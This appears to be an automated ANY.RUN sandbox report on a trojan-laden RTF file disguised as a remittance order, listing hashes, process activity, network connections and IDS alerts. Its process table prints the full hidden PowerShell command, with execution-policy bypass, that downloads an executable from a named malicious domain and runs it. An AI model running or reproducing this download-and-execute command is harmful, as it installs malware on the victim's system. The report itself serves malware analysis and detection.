analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Remittance_Order.doc

Full analysis: https://app.any.run/tasks/bb2ce2ed-bb49-4b82-8812-8dca5d547ec3
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: August 20, 2020, 11:43:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
trojan
opendir
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

EF2E3AE48EB13019BD8C339F72657E23

SHA1:

01DCEA315CB389FEE1DBE865834D76254C18D7E7

SHA256:

FCDDC48DC220FD77886E252FC56457FF94DF342001089EA08BE93EE60C9741FE

SSDEEP:

1536:9WoooooooooooooooooooooooooooooouooooooooooooooooooooooooooooouM:9d8raRDAw5wfB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2592)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2592)
    • Requests a remote executable file from MS Office

      • WINWORD.EXE (PID: 2592)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2364)
  • INFO

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2592)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2592)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2592)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2592"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Remittance_Order.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2364"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://terraliet-be.com/aug17o.exe','C:\Users\admin\AppData\Roaming\aug17o.exe');Start-Process 'C:\Users\admin\AppData\Roaming\aug17o.exe'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
995
Read events
848
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2592WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2FE5.tmp.cvr
MD5:
SHA256:
2592WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\832222A8.png
MD5:
SHA256:
2364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7BNA0LDM9U6E87YCMJQ5.temp
MD5:
SHA256:
2364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe3e6c.TMPbinary
MD5:9692C1097FC583EC616BF5A5F1236A46
SHA256:FD9D66BEC983BAD1403AB287511A3ABE044CB365DBE8F5DD35293909E569B7B3
2364powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:9692C1097FC583EC616BF5A5F1236A46
SHA256:FD9D66BEC983BAD1403AB287511A3ABE044CB365DBE8F5DD35293909E569B7B3
2592WINWORD.EXEC:\Users\admin\AppData\Local\Temp\AbctfhghgdghghŸ.scTbinary
MD5:E21B8D07D5F3B35AAAEE9E415D82DC39
SHA256:BF834954B219CDF9A15E6AE62B22B4E30857AF1726ED1D5E64BC064F2F78AE09
2592WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$mittance_Order.doc.rtfpgc
MD5:616F83C46D9C8F5CCAD8086ADB986AB8
SHA256:ECCDDE04037237FAD61EF01A87FB52EE406F60BF753B1152B5F234128EC82A00
2592WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A0B775B3FEC2E4BAB3E1AEB1F71AE878
SHA256:D61D9D9E47AA77624EA9B9B7A602A78DE0582BC4E779A50271D1C4A260D0CCB8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2592
WINWORD.EXE
GET
403
23.254.227.145:80
http://terraliet-be.com/aug17o.exe
US
html
318 b
malicious
2364
powershell.exe
GET
403
23.254.227.145:80
http://terraliet-be.com/aug17o.exe
US
html
318 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2364
powershell.exe
23.254.227.145:80
terraliet-be.com
Hostwinds LLC.
US
malicious
23.254.227.145:80
terraliet-be.com
Hostwinds LLC.
US
malicious

DNS requests

Domain
IP
Reputation
terraliet-be.com
  • 23.254.227.145
malicious

Threats

PID
Process
Class
Message
2592
WINWORD.EXE
A Network Trojan was detected
ET TROJAN Possible Malicious Macro DL EXE Feb 2016
2592
WINWORD.EXE
A Network Trojan was detected
ET TROJAN Possible Malicious Macro EXE DL AlphaNumL
No debug info